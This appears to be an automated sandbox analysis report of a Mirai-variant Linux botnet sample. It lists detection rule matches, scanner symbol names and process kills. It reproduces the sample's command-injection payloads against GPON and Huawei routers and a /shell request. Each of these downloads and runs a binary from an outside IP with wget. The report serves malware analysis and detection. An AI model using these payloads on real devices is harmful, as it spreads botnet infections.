      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive

      System Summary

      barindex
      Source: yRo17s2Sbc, type: SAMPLEMatched rule: Detects ELF Mirai variant Author: Florian Roth
      Source: yRo17s2Sbc, type: SAMPLEMatched rule: Detects ELF malware Mirai related Author: Florian Roth
      Source: 6228.1.00007faa5c017000.00007faa5c031000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
      Source: 6228.1.00007faa5c017000.00007faa5c031000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
      Source: 6232.1.00007faa5c017000.00007faa5c031000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
      Source: 6232.1.00007faa5c017000.00007faa5c031000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
      Source: ELF static info symbol of initial sampleName: attack.c
      Source: ELF static info symbol of initial sampleName: attack_app.c
      Source: ELF static info symbol of initial sampleName: attack_app_http
      Source: ELF static info symbol of initial sampleName: attack_get_opt_int
      Source: ELF static info symbol of initial sampleName: attack_get_opt_ip
      Source: ELF static info symbol of initial sampleName: attack_get_opt_str
      Source: ELF static info symbol of initial sampleName: attack_gre.c
      Source: ELF static info symbol of initial sampleName: attack_gre_eth
      Source: ELF static info symbol of initial sampleName: attack_gre_ip
      Source: ELF static info symbol of initial sampleName: attack_init
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 2018, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 2077, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 2078, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 2079, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 2080, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 2083, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 2084, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 2156, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 6247, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 6248, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 6249, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 6250, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 6251, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 6252, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 6271, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 6280, result: successfulJump to behavior
      Source: yRo17s2Sbc, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
      Source: yRo17s2Sbc, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
      Source: yRo17s2Sbc, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: yRo17s2Sbc, type: SAMPLEMatched rule: MAL_ARM_LNX_Mirai_Mar13_2022 date = 2022-03-16, hash1 = 0283b72913b8a78b2a594b2d40ebc3c873e4823299833a1ff6854421378f5a68, author = Mehmet Ali Kerimoglu a.k.a. CYB3RMX, description = Detects new ARM Mirai variant
      Source: 6232.1.00007faa5c03a000.00007faa5c03f000.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
      Source: 6228.1.00007faa5c03a000.00007faa5c03f000.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
      Source: 6228.1.00007faa5c017000.00007faa5c031000.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
      Source: 6228.1.00007faa5c017000.00007faa5c031000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
      Source: 6228.1.00007faa5c017000.00007faa5c031000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 6232.1.00007faa5c017000.00007faa5c031000.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
      Source: 6232.1.00007faa5c017000.00007faa5c031000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
      Source: 6232.1.00007faa5c017000.00007faa5c031000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: Process Memory Space: yRo17s2Sbc PID: 6228, type: MEMORYSTRMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
      Source: Process Memory Space: yRo17s2Sbc PID: 6232, type: MEMORYSTRMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 2018, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 2077, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 2078, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 2079, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 2080, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 2083, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 2084, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 2156, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 6247, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 6248, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 6249, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 6250, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 6251, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 6252, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 6271, result: successfulJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)SIGKILL sent: pid: 6280, result: successfulJump to behavior
      Source: yRo17s2SbcELF static info symbol of initial sample: __gnu_unwind_execute
      Source: yRo17s2SbcELF static info symbol of initial sample: gpon443_scanner
      Source: yRo17s2SbcELF static info symbol of initial sample: gpon443_scanner_pid
      Source: yRo17s2SbcELF static info symbol of initial sample: gpon443_scanner_rawpkt
      Source: yRo17s2SbcELF static info symbol of initial sample: huaweiscanner_fake_time
      Source: yRo17s2SbcELF static info symbol of initial sample: huaweiscanner_rsck
      Source: yRo17s2SbcELF static info symbol of initial sample: huaweiscanner_scanner_init
      Source: yRo17s2SbcELF static info symbol of initial sample: huaweiscanner_scanner_kill
      Source: yRo17s2SbcELF static info symbol of initial sample: huaweiscanner_scanner_pid
      Source: yRo17s2SbcELF static info symbol of initial sample: huaweiscanner_scanner_rawpkt
      Source: yRo17s2SbcELF static info symbol of initial sample: huaweiscanner_setup_connection
      Source: yRo17s2SbcELF static info symbol of initial sample: jaws_scanner
      Source: yRo17s2SbcELF static info symbol of initial sample: jaws_scanner_pid
      Source: yRo17s2SbcELF static info symbol of initial sample: jaws_scanner_rawpkt
      Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://199.195.250.211/bin+-O+/tmp/gpon443;sh+/tmp/gpon443`&ipv=0
      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://199.195.250.211/bin+-O+/tmp/gpon443;sh+/tmp/gpon443`&ipv=0POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
      Source: classification engineClassification label: mal100.spre.troj.lin@0/0@1/0
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/6233/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/6236/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/6235/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1582/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/2033/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/2275/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/3088/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/6190/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1612/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1579/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1699/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1335/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1698/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/2028/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1334/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1576/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/2302/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/3236/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/2025/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/2146/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/910/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/912/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/517/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/759/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/2307/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/918/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/6240/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/4464/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/6247/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/4465/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1594/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/2285/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/2281/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1349/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1623/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/761/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1622/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/884/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1983/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/2038/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1344/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1465/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1586/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1860/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1463/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/2156/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/800/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/801/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1629/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1627/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1900/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/6252/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/6251/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/3021/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/491/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/2294/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/2050/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/6250/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1877/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/772/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1633/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1599/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1632/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/774/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1477/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/654/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/896/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1476/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1872/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/2048/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/655/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1475/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/2289/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/656/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/777/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/657/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/4466/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/6249/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/658/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/4467/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/6248/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/419/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/936/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1639/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1638/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/2208/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/2180/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1809/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1494/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1890/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/2063/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/2062/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1888/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1886/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/420/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1489/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/785/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1642/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/788/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/667/cmdlineJump to behavior
